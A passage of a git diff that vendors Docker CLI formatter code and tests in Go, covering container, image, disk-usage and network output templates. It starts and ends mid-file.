+ Context{ + Format: NewContainerFormat("table {{.Image}}", false, true), + Output: out, + }, + "IMAGE\n", + }, + { + Context{ + Format: "table {{.Image}}\t{{.Size}}", + Output: out, + }, + "IMAGE SIZE\n", + }, + { + Context{ + Format: NewContainerFormat("table {{.Image}}\t{{.Size}}", false, true), + Output: out, + }, + "IMAGE SIZE\n", + }, + } + + for _, context := range contexts { + ContainerWrite(context.context, containers) + assert.Equal(t, context.expected, out.String()) + // Clean buffer + out.Reset() + } +} + +func TestContainerContextWriteJSON(t *testing.T) { + unix := time.Now().Add(-65 * time.Second).Unix() + containers := []types.Container{ + {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unix}, + {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unix}, + } + expectedCreated := time.Unix(unix, 0).String() + expectedJSONs := []map[string]interface{}{ + {"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID1", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_baz", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""}, + {"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID2", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_bar", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""}, + } + out := bytes.NewBufferString("") + err := ContainerWrite(Context{Format: "{{json .}}", Output: out}, containers) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var m map[string]interface{} + if err := json.Unmarshal([]byte(line), &m); err != nil { + t.Fatal(err) + } + assert.DeepEqual(t, m, expectedJSONs[i]) + } +} + +func TestContainerContextWriteJSONField(t *testing.T) { + containers := []types.Container{ + {ID: "containerID1", 
Names: []string{"/foobar_baz"}, Image: "ubuntu"}, + {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu"}, + } + out := bytes.NewBufferString("") + err := ContainerWrite(Context{Format: "{{json .ID}}", Output: out}, containers) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var s string + if err := json.Unmarshal([]byte(line), &s); err != nil { + t.Fatal(err) + } + assert.Equal(t, s, containers[i].ID) + } +} + +func TestContainerBackCompat(t *testing.T) { + containers := []types.Container{{ID: "brewhaha"}} + cases := []string{ + "ID", + "Names", + "Image", + "Command", + "CreatedAt", + "RunningFor", + "Ports", + "Status", + "Size", + "Labels", + "Mounts", + } + buf := bytes.NewBuffer(nil) + for _, c := range cases { + ctx := Context{Format: Format(fmt.Sprintf("{{ .%s }}", c)), Output: buf} + if err := ContainerWrite(ctx, containers); err != nil { + t.Logf("could not render template for field '%s': %v", c, err) + t.Fail() + } + buf.Reset() + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom.go b/vendor/github.com/docker/docker/cli/command/formatter/custom.go new file mode 100644 index 0000000000..df32684429 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/custom.go @@ -0,0 +1,51 @@ +package formatter + +import ( + "strings" +) + +const ( + imageHeader = "IMAGE" + createdSinceHeader = "CREATED" + createdAtHeader = "CREATED AT" + sizeHeader = "SIZE" + labelsHeader = "LABELS" + nameHeader = "NAME" + driverHeader = "DRIVER" + scopeHeader = "SCOPE" +) + +type subContext interface { + FullHeader() string + AddHeader(header string) +} + +// HeaderContext provides the subContext interface for managing headers +type HeaderContext struct { + header []string +} + +// FullHeader returns the header as a string +func (c *HeaderContext) FullHeader() string { + if c.header == nil { + return "" + } + 
return strings.Join(c.header, "\t") +} + +// AddHeader adds another column to the header +func (c *HeaderContext) AddHeader(header string) { + if c.header == nil { + c.header = []string{} + } + c.header = append(c.header, strings.ToUpper(header)) +} + +func stripNamePrefix(ss []string) []string { + sss := make([]string, len(ss)) + for i, s := range ss { + sss[i] = s[1:] + } + + return sss +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go b/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go new file mode 100644 index 0000000000..da42039dca --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go @@ -0,0 +1,28 @@ +package formatter + +import ( + "reflect" + "strings" + "testing" +) + +func compareMultipleValues(t *testing.T, value, expected string) { + // comma-separated values means probably a map input, which won't + // be guaranteed to have the same order as our expected value + // We'll create maps and use reflect.DeepEquals to check instead: + entriesMap := make(map[string]string) + expMap := make(map[string]string) + entries := strings.Split(value, ",") + expectedEntries := strings.Split(expected, ",") + for _, entry := range entries { + keyval := strings.Split(entry, "=") + entriesMap[keyval[0]] = keyval[1] + } + for _, expected := range expectedEntries { + keyval := strings.Split(expected, "=") + expMap[keyval[0]] = keyval[1] + } + if !reflect.DeepEqual(expMap, entriesMap) { + t.Fatalf("Expected entries: %v, got: %v", expected, value) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go b/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go new file mode 100644 index 0000000000..5309d880a5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go @@ -0,0 +1,334 @@ +package formatter + +import ( + "bytes" + "fmt" + "strings" + "text/template" + + "github.com/docker/distribution/reference" + 
"github.com/docker/docker/api/types" + units "github.com/docker/go-units" +) + +const ( + defaultDiskUsageImageTableFormat = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.VirtualSize}}\t{{.SharedSize}}\t{{.UniqueSize}}\t{{.Containers}}" + defaultDiskUsageContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.LocalVolumes}}\t{{.Size}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Names}}" + defaultDiskUsageVolumeTableFormat = "table {{.Name}}\t{{.Links}}\t{{.Size}}" + defaultDiskUsageTableFormat = "table {{.Type}}\t{{.TotalCount}}\t{{.Active}}\t{{.Size}}\t{{.Reclaimable}}" + + typeHeader = "TYPE" + totalHeader = "TOTAL" + activeHeader = "ACTIVE" + reclaimableHeader = "RECLAIMABLE" + containersHeader = "CONTAINERS" + sharedSizeHeader = "SHARED SIZE" + uniqueSizeHeader = "UNIQUE SiZE" +) + +// DiskUsageContext contains disk usage specific information required by the formater, encapsulate a Context struct. +type DiskUsageContext struct { + Context + Verbose bool + LayersSize int64 + Images []*types.ImageSummary + Containers []*types.Container + Volumes []*types.Volume +} + +func (ctx *DiskUsageContext) startSubsection(format string) (*template.Template, error) { + ctx.buffer = bytes.NewBufferString("") + ctx.header = "" + ctx.Format = Format(format) + ctx.preFormat() + + return ctx.parseFormat() +} + +func (ctx *DiskUsageContext) Write() { + if ctx.Verbose == false { + ctx.buffer = bytes.NewBufferString("") + ctx.Format = defaultDiskUsageTableFormat + ctx.preFormat() + + tmpl, err := ctx.parseFormat() + if err != nil { + return + } + + err = ctx.contextFormat(tmpl, &diskUsageImagesContext{ + totalSize: ctx.LayersSize, + images: ctx.Images, + }) + if err != nil { + return + } + err = ctx.contextFormat(tmpl, &diskUsageContainersContext{ + containers: ctx.Containers, + }) + if err != nil { + return + } + + err = ctx.contextFormat(tmpl, &diskUsageVolumesContext{ + volumes: ctx.Volumes, + }) + if err != nil { + return + } + + ctx.postFormat(tmpl, 
&diskUsageContainersContext{containers: []*types.Container{}}) + + return + } + + // First images + tmpl, err := ctx.startSubsection(defaultDiskUsageImageTableFormat) + if err != nil { + return + } + + ctx.Output.Write([]byte("Images space usage:\n\n")) + for _, i := range ctx.Images { + repo := "" + tag := "" + if len(i.RepoTags) > 0 && !isDangling(*i) { + // Only show the first tag + ref, err := reference.ParseNamed(i.RepoTags[0]) + if err != nil { + continue + } + if nt, ok := ref.(reference.NamedTagged); ok { + repo = ref.Name() + tag = nt.Tag() + } + } + + err = ctx.contextFormat(tmpl, &imageContext{ + repo: repo, + tag: tag, + trunc: true, + i: *i, + }) + if err != nil { + return + } + } + ctx.postFormat(tmpl, &imageContext{}) + + // Now containers + ctx.Output.Write([]byte("\nContainers space usage:\n\n")) + tmpl, err = ctx.startSubsection(defaultDiskUsageContainerTableFormat) + if err != nil { + return + } + for _, c := range ctx.Containers { + // Don't display the virtual size + c.SizeRootFs = 0 + err = ctx.contextFormat(tmpl, &containerContext{ + trunc: true, + c: *c, + }) + if err != nil { + return + } + } + ctx.postFormat(tmpl, &containerContext{}) + + // And volumes + ctx.Output.Write([]byte("\nLocal Volumes space usage:\n\n")) + tmpl, err = ctx.startSubsection(defaultDiskUsageVolumeTableFormat) + if err != nil { + return + } + for _, v := range ctx.Volumes { + err = ctx.contextFormat(tmpl, &volumeContext{ + v: *v, + }) + if err != nil { + return + } + } + ctx.postFormat(tmpl, &volumeContext{v: types.Volume{}}) +} + +type diskUsageImagesContext struct { + HeaderContext + totalSize int64 + images []*types.ImageSummary +} + +func (c *diskUsageImagesContext) Type() string { + c.AddHeader(typeHeader) + return "Images" +} + +func (c *diskUsageImagesContext) TotalCount() string { + c.AddHeader(totalHeader) + return fmt.Sprintf("%d", len(c.images)) +} + +func (c *diskUsageImagesContext) Active() string { + c.AddHeader(activeHeader) + used := 0 + for _, i := 
range c.images { + if i.Containers > 0 { + used++ + } + } + + return fmt.Sprintf("%d", used) +} + +func (c *diskUsageImagesContext) Size() string { + c.AddHeader(sizeHeader) + return units.HumanSize(float64(c.totalSize)) + +} + +func (c *diskUsageImagesContext) Reclaimable() string { + var used int64 + + c.AddHeader(reclaimableHeader) + for _, i := range c.images { + if i.Containers != 0 { + if i.VirtualSize == -1 || i.SharedSize == -1 { + continue + } + used += i.VirtualSize - i.SharedSize + } + } + + reclaimable := c.totalSize - used + if c.totalSize > 0 { + return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/c.totalSize) + } + return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) +} + +type diskUsageContainersContext struct { + HeaderContext + verbose bool + containers []*types.Container +} + +func (c *diskUsageContainersContext) Type() string { + c.AddHeader(typeHeader) + return "Containers" +} + +func (c *diskUsageContainersContext) TotalCount() string { + c.AddHeader(totalHeader) + return fmt.Sprintf("%d", len(c.containers)) +} + +func (c *diskUsageContainersContext) isActive(container types.Container) bool { + return strings.Contains(container.State, "running") || + strings.Contains(container.State, "paused") || + strings.Contains(container.State, "restarting") +} + +func (c *diskUsageContainersContext) Active() string { + c.AddHeader(activeHeader) + used := 0 + for _, container := range c.containers { + if c.isActive(*container) { + used++ + } + } + + return fmt.Sprintf("%d", used) +} + +func (c *diskUsageContainersContext) Size() string { + var size int64 + + c.AddHeader(sizeHeader) + for _, container := range c.containers { + size += container.SizeRw + } + + return units.HumanSize(float64(size)) +} + +func (c *diskUsageContainersContext) Reclaimable() string { + var reclaimable int64 + var totalSize int64 + + c.AddHeader(reclaimableHeader) + for _, container := range c.containers { + if 
!c.isActive(*container) { + reclaimable += container.SizeRw + } + totalSize += container.SizeRw + } + + if totalSize > 0 { + return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize) + } + + return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) +} + +type diskUsageVolumesContext struct { + HeaderContext + verbose bool + volumes []*types.Volume +} + +func (c *diskUsageVolumesContext) Type() string { + c.AddHeader(typeHeader) + return "Local Volumes" +} + +func (c *diskUsageVolumesContext) TotalCount() string { + c.AddHeader(totalHeader) + return fmt.Sprintf("%d", len(c.volumes)) +} + +func (c *diskUsageVolumesContext) Active() string { + c.AddHeader(activeHeader) + + used := 0 + for _, v := range c.volumes { + if v.UsageData.RefCount > 0 { + used++ + } + } + + return fmt.Sprintf("%d", used) +} + +func (c *diskUsageVolumesContext) Size() string { + var size int64 + + c.AddHeader(sizeHeader) + for _, v := range c.volumes { + if v.UsageData.Size != -1 { + size += v.UsageData.Size + } + } + + return units.HumanSize(float64(size)) +} + +func (c *diskUsageVolumesContext) Reclaimable() string { + var reclaimable int64 + var totalSize int64 + + c.AddHeader(reclaimableHeader) + for _, v := range c.volumes { + if v.UsageData.Size != -1 { + if v.UsageData.RefCount == 0 { + reclaimable += v.UsageData.Size + } + totalSize += v.UsageData.Size + } + } + + if totalSize > 0 { + return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize) + } + + return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/formatter.go b/vendor/github.com/docker/docker/cli/command/formatter/formatter.go new file mode 100644 index 0000000000..e859a1ca26 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/formatter.go @@ -0,0 +1,123 @@ +package formatter + +import ( + "bytes" + "fmt" + "io" + "strings" + 
"text/tabwriter" + "text/template" + + "github.com/docker/docker/utils/templates" +) + +// Format keys used to specify certain kinds of output formats +const ( + TableFormatKey = "table" + RawFormatKey = "raw" + PrettyFormatKey = "pretty" + + defaultQuietFormat = "{{.ID}}" +) + +// Format is the format string rendered using the Context +type Format string + +// IsTable returns true if the format is a table-type format +func (f Format) IsTable() bool { + return strings.HasPrefix(string(f), TableFormatKey) +} + +// Contains returns true if the format contains the substring +func (f Format) Contains(sub string) bool { + return strings.Contains(string(f), sub) +} + +// Context contains information required by the formatter to print the output as desired. +type Context struct { + // Output is the output stream to which the formatted string is written. + Output io.Writer + // Format is used to choose raw, table or custom format for the output. + Format Format + // Trunc when set to true will truncate the output of certain fields such as Container ID. 
+ Trunc bool + + // internal element + finalFormat string + header string + buffer *bytes.Buffer +} + +func (c *Context) preFormat() { + c.finalFormat = string(c.Format) + + // TODO: handle this in the Format type + if c.Format.IsTable() { + c.finalFormat = c.finalFormat[len(TableFormatKey):] + } + + c.finalFormat = strings.Trim(c.finalFormat, " ") + r := strings.NewReplacer(`\t`, "\t", `\n`, "\n") + c.finalFormat = r.Replace(c.finalFormat) +} + +func (c *Context) parseFormat() (*template.Template, error) { + tmpl, err := templates.Parse(c.finalFormat) + if err != nil { + return tmpl, fmt.Errorf("Template parsing error: %v\n", err) + } + return tmpl, err +} + +func (c *Context) postFormat(tmpl *template.Template, subContext subContext) { + if c.Format.IsTable() { + if len(c.header) == 0 { + // if we still don't have a header, we didn't have any containers so we need to fake it to get the right headers from the template + tmpl.Execute(bytes.NewBufferString(""), subContext) + c.header = subContext.FullHeader() + } + + t := tabwriter.NewWriter(c.Output, 20, 1, 3, ' ', 0) + t.Write([]byte(c.header)) + t.Write([]byte("\n")) + c.buffer.WriteTo(t) + t.Flush() + } else { + c.buffer.WriteTo(c.Output) + } +} + +func (c *Context) contextFormat(tmpl *template.Template, subContext subContext) error { + if err := tmpl.Execute(c.buffer, subContext); err != nil { + return fmt.Errorf("Template parsing error: %v\n", err) + } + if c.Format.IsTable() && len(c.header) == 0 { + c.header = subContext.FullHeader() + } + c.buffer.WriteString("\n") + return nil +} + +// SubFormat is a function type accepted by Write() +type SubFormat func(func(subContext) error) error + +// Write the template to the buffer using this Context +func (c *Context) Write(sub subContext, f SubFormat) error { + c.buffer = bytes.NewBufferString("") + c.preFormat() + + tmpl, err := c.parseFormat() + if err != nil { + return err + } + + subFormat := func(subContext subContext) error { + return c.contextFormat(tmpl, 
subContext) + } + if err := f(subFormat); err != nil { + return err + } + + c.postFormat(tmpl, sub) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image.go b/vendor/github.com/docker/docker/cli/command/formatter/image.go new file mode 100644 index 0000000000..5c7de826f0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/image.go @@ -0,0 +1,259 @@ +package formatter + +import ( + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + units "github.com/docker/go-units" +) + +const ( + defaultImageTableFormat = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}" + defaultImageTableFormatWithDigest = "table {{.Repository}}\t{{.Tag}}\t{{.Digest}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}" + + imageIDHeader = "IMAGE ID" + repositoryHeader = "REPOSITORY" + tagHeader = "TAG" + digestHeader = "DIGEST" +) + +// ImageContext contains image specific information required by the formater, encapsulate a Context struct. 
+type ImageContext struct { + Context + Digest bool +} + +func isDangling(image types.ImageSummary) bool { + return len(image.RepoTags) == 1 && image.RepoTags[0] == ":" && len(image.RepoDigests) == 1 && image.RepoDigests[0] == "@" +} + +// NewImageFormat returns a format for rendering an ImageContext +func NewImageFormat(source string, quiet bool, digest bool) Format { + switch source { + case TableFormatKey: + switch { + case quiet: + return defaultQuietFormat + case digest: + return defaultImageTableFormatWithDigest + default: + return defaultImageTableFormat + } + case RawFormatKey: + switch { + case quiet: + return `image_id: {{.ID}}` + case digest: + return `repository: {{ .Repository }} +tag: {{.Tag}} +digest: {{.Digest}} +image_id: {{.ID}} +created_at: {{.CreatedAt}} +virtual_size: {{.Size}} +` + default: + return `repository: {{ .Repository }} +tag: {{.Tag}} +image_id: {{.ID}} +created_at: {{.CreatedAt}} +virtual_size: {{.Size}} +` + } + } + + format := Format(source) + if format.IsTable() && digest && !format.Contains("{{.Digest}}") { + format += "\t{{.Digest}}" + } + return format +} + +// ImageWrite writes the formatter images using the ImageContext +func ImageWrite(ctx ImageContext, images []types.ImageSummary) error { + render := func(format func(subContext subContext) error) error { + return imageFormat(ctx, images, format) + } + return ctx.Write(&imageContext{}, render) +} + +func imageFormat(ctx ImageContext, images []types.ImageSummary, format func(subContext subContext) error) error { + for _, image := range images { + images := []*imageContext{} + if isDangling(image) { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: "", + tag: "", + digest: "", + }) + } else { + repoTags := map[string][]string{} + repoDigests := map[string][]string{} + + for _, refString := range append(image.RepoTags) { + ref, err := reference.ParseNamed(refString) + if err != nil { + continue + } + if nt, ok := ref.(reference.NamedTagged); ok { 
+ repoTags[ref.Name()] = append(repoTags[ref.Name()], nt.Tag()) + } + } + for _, refString := range append(image.RepoDigests) { + ref, err := reference.ParseNamed(refString) + if err != nil { + continue + } + if c, ok := ref.(reference.Canonical); ok { + repoDigests[ref.Name()] = append(repoDigests[ref.Name()], c.Digest().String()) + } + } + + for repo, tags := range repoTags { + digests := repoDigests[repo] + + // Do not display digests as their own row + delete(repoDigests, repo) + + if !ctx.Digest { + // Ignore digest references, just show tag once + digests = nil + } + + for _, tag := range tags { + if len(digests) == 0 { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: repo, + tag: tag, + digest: "", + }) + continue + } + // Display the digests for each tag + for _, dgst := range digests { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: repo, + tag: tag, + digest: dgst, + }) + } + + } + } + + // Show rows for remaining digest only references + for repo, digests := range repoDigests { + // If digests are displayed, show row per digest + if ctx.Digest { + for _, dgst := range digests { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: repo, + tag: "", + digest: dgst, + }) + } + } else { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: repo, + tag: "", + }) + } + } + } + for _, imageCtx := range images { + if err := format(imageCtx); err != nil { + return err + } + } + } + return nil +} + +type imageContext struct { + HeaderContext + trunc bool + i types.ImageSummary + repo string + tag string + digest string +} + +func (c *imageContext) ID() string { + c.AddHeader(imageIDHeader) + if c.trunc { + return stringid.TruncateID(c.i.ID) + } + return c.i.ID +} + +func (c *imageContext) Repository() string { + c.AddHeader(repositoryHeader) + return c.repo +} + +func (c *imageContext) Tag() string { + c.AddHeader(tagHeader) + return c.tag +} + 
+func (c *imageContext) Digest() string { + c.AddHeader(digestHeader) + return c.digest +} + +func (c *imageContext) CreatedSince() string { + c.AddHeader(createdSinceHeader) + createdAt := time.Unix(int64(c.i.Created), 0) + return units.HumanDuration(time.Now().UTC().Sub(createdAt)) +} + +func (c *imageContext) CreatedAt() string { + c.AddHeader(createdAtHeader) + return time.Unix(int64(c.i.Created), 0).String() +} + +func (c *imageContext) Size() string { + c.AddHeader(sizeHeader) + return units.HumanSizeWithPrecision(float64(c.i.Size), 3) +} + +func (c *imageContext) Containers() string { + c.AddHeader(containersHeader) + if c.i.Containers == -1 { + return "N/A" + } + return fmt.Sprintf("%d", c.i.Containers) +} + +func (c *imageContext) VirtualSize() string { + c.AddHeader(sizeHeader) + return units.HumanSize(float64(c.i.VirtualSize)) +} + +func (c *imageContext) SharedSize() string { + c.AddHeader(sharedSizeHeader) + if c.i.SharedSize == -1 { + return "N/A" + } + return units.HumanSize(float64(c.i.SharedSize)) +} + +func (c *imageContext) UniqueSize() string { + c.AddHeader(uniqueSizeHeader) + if c.i.VirtualSize == -1 || c.i.SharedSize == -1 { + return "N/A" + } + return units.HumanSize(float64(c.i.VirtualSize - c.i.SharedSize)) +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image_test.go b/vendor/github.com/docker/docker/cli/command/formatter/image_test.go new file mode 100644 index 0000000000..ffe77f6677 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/image_test.go @@ -0,0 +1,333 @@ +package formatter + +import ( + "bytes" + "fmt" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestImageContext(t *testing.T) { + imageID := stringid.GenerateRandomID() + unix := time.Now().Unix() + + var ctx imageContext + cases := []struct { + imageCtx imageContext + expValue string + expHeader string + 
call func() string + }{ + {imageContext{ + i: types.ImageSummary{ID: imageID}, + trunc: true, + }, stringid.TruncateID(imageID), imageIDHeader, ctx.ID}, + {imageContext{ + i: types.ImageSummary{ID: imageID}, + trunc: false, + }, imageID, imageIDHeader, ctx.ID}, + {imageContext{ + i: types.ImageSummary{Size: 10, VirtualSize: 10}, + trunc: true, + }, "10 B", sizeHeader, ctx.Size}, + {imageContext{ + i: types.ImageSummary{Created: unix}, + trunc: true, + }, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt}, + // FIXME + // {imageContext{ + // i: types.ImageSummary{Created: unix}, + // trunc: true, + // }, units.HumanDuration(time.Unix(unix, 0)), createdSinceHeader, ctx.CreatedSince}, + {imageContext{ + i: types.ImageSummary{}, + repo: "busybox", + }, "busybox", repositoryHeader, ctx.Repository}, + {imageContext{ + i: types.ImageSummary{}, + tag: "latest", + }, "latest", tagHeader, ctx.Tag}, + {imageContext{ + i: types.ImageSummary{}, + digest: "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", + }, "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", digestHeader, ctx.Digest}, + } + + for _, c := range cases { + ctx = c.imageCtx + v := c.call() + if strings.Contains(v, ",") { + compareMultipleValues(t, v, c.expValue) + } else if v != c.expValue { + t.Fatalf("Expected %s, was %s\n", c.expValue, v) + } + + h := ctx.FullHeader() + if h != c.expHeader { + t.Fatalf("Expected %s, was %s\n", c.expHeader, h) + } + } +} + +func TestImageContextWrite(t *testing.T) { + unixTime := time.Now().AddDate(0, 0, -1).Unix() + expectedTime := time.Unix(unixTime, 0).String() + + cases := []struct { + context ImageContext + expected string + }{ + // Errors + { + ImageContext{ + Context: Context{ + Format: "{{InvalidFunction}}", + }, + }, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + ImageContext{ + Context: Context{ + Format: "{{nil}}", + }, + }, + `Template parsing error: template: 
:1:2: executing "" at : nil is not a command +`, + }, + // Table Format + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table", false, false), + }, + }, + `REPOSITORY TAG IMAGE ID CREATED SIZE +image tag1 imageID1 24 hours ago 0 B +image tag2 imageID2 24 hours ago 0 B + imageID3 24 hours ago 0 B +`, + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table {{.Repository}}", false, false), + }, + }, + "REPOSITORY\nimage\nimage\n\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table {{.Repository}}", false, true), + }, + Digest: true, + }, + `REPOSITORY DIGEST +image sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf +image + +`, + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table {{.Repository}}", true, false), + }, + }, + "REPOSITORY\nimage\nimage\n\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table", true, false), + }, + }, + "imageID1\nimageID2\nimageID3\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table", false, true), + }, + Digest: true, + }, + `REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE +image tag1 sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf imageID1 24 hours ago 0 B +image tag2 imageID2 24 hours ago 0 B + imageID3 24 hours ago 0 B +`, + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table", true, true), + }, + Digest: true, + }, + "imageID1\nimageID2\nimageID3\n", + }, + // Raw Format + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("raw", false, false), + }, + }, + fmt.Sprintf(`repository: image +tag: tag1 +image_id: imageID1 +created_at: %s +virtual_size: 0 B + +repository: image +tag: tag2 +image_id: imageID2 +created_at: %s +virtual_size: 0 B + +repository: +tag: +image_id: imageID3 +created_at: %s +virtual_size: 0 B + +`, expectedTime, expectedTime, expectedTime), + }, + { + ImageContext{ + Context: Context{ + Format: 
NewImageFormat("raw", false, true), + }, + Digest: true, + }, + fmt.Sprintf(`repository: image +tag: tag1 +digest: sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf +image_id: imageID1 +created_at: %s +virtual_size: 0 B + +repository: image +tag: tag2 +digest: +image_id: imageID2 +created_at: %s +virtual_size: 0 B + +repository: +tag: +digest: +image_id: imageID3 +created_at: %s +virtual_size: 0 B + +`, expectedTime, expectedTime, expectedTime), + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("raw", true, false), + }, + }, + `image_id: imageID1 +image_id: imageID2 +image_id: imageID3 +`, + }, + // Custom Format + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("{{.Repository}}", false, false), + }, + }, + "image\nimage\n\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("{{.Repository}}", false, true), + }, + Digest: true, + }, + "image\nimage\n\n", + }, + } + + for _, testcase := range cases { + images := []types.ImageSummary{ + {ID: "imageID1", RepoTags: []string{"image:tag1"}, RepoDigests: []string{"image@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"}, Created: unixTime}, + {ID: "imageID2", RepoTags: []string{"image:tag2"}, Created: unixTime}, + {ID: "imageID3", RepoTags: []string{":"}, RepoDigests: []string{"@"}, Created: unixTime}, + } + out := bytes.NewBufferString("") + testcase.context.Output = out + err := ImageWrite(testcase.context, images) + if err != nil { + assert.Error(t, err, testcase.expected) + } else { + assert.Equal(t, out.String(), testcase.expected) + } + } +} + +func TestImageContextWriteWithNoImage(t *testing.T) { + out := bytes.NewBufferString("") + images := []types.ImageSummary{} + + contexts := []struct { + context ImageContext + expected string + }{ + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("{{.Repository}}", false, false), + Output: out, + }, + }, + "", + }, + { + ImageContext{ + Context: Context{ + 
Format: NewImageFormat("table {{.Repository}}", false, false), + Output: out, + }, + }, + "REPOSITORY\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("{{.Repository}}", false, true), + Output: out, + }, + }, + "", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table {{.Repository}}", false, true), + Output: out, + }, + }, + "REPOSITORY DIGEST\n", + }, + } + + for _, context := range contexts { + ImageWrite(context.context, images) + assert.Equal(t, out.String(), context.expected) + // Clean buffer + out.Reset() + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network.go b/vendor/github.com/docker/docker/cli/command/formatter/network.go new file mode 100644 index 0000000000..7fbad7d2ab --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/network.go @@ -0,0 +1,117 @@ +package formatter + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" +) + +const ( + defaultNetworkTableFormat = "table {{.ID}}\t{{.Name}}\t{{.Driver}}\t{{.Scope}}" + + networkIDHeader = "NETWORK ID" + ipv6Header = "IPV6" + internalHeader = "INTERNAL" +) + +// NewNetworkFormat returns a Format for rendering using a network Context +func NewNetworkFormat(source string, quiet bool) Format { + switch source { + case TableFormatKey: + if quiet { + return defaultQuietFormat + } + return defaultNetworkTableFormat + case RawFormatKey: + if quiet { + return `network_id: {{.ID}}` + } + return `network_id: {{.ID}}\nname: {{.Name}}\ndriver: {{.Driver}}\nscope: {{.Scope}}\n` + } + return Format(source) +} + +// NetworkWrite writes the context +func NetworkWrite(ctx Context, networks []types.NetworkResource) error { + render := func(format func(subContext subContext) error) error { + for _, network := range networks { + networkCtx := &networkContext{trunc: ctx.Trunc, n: network} + if err := format(networkCtx); err != nil { + return err + } + } + return nil + 
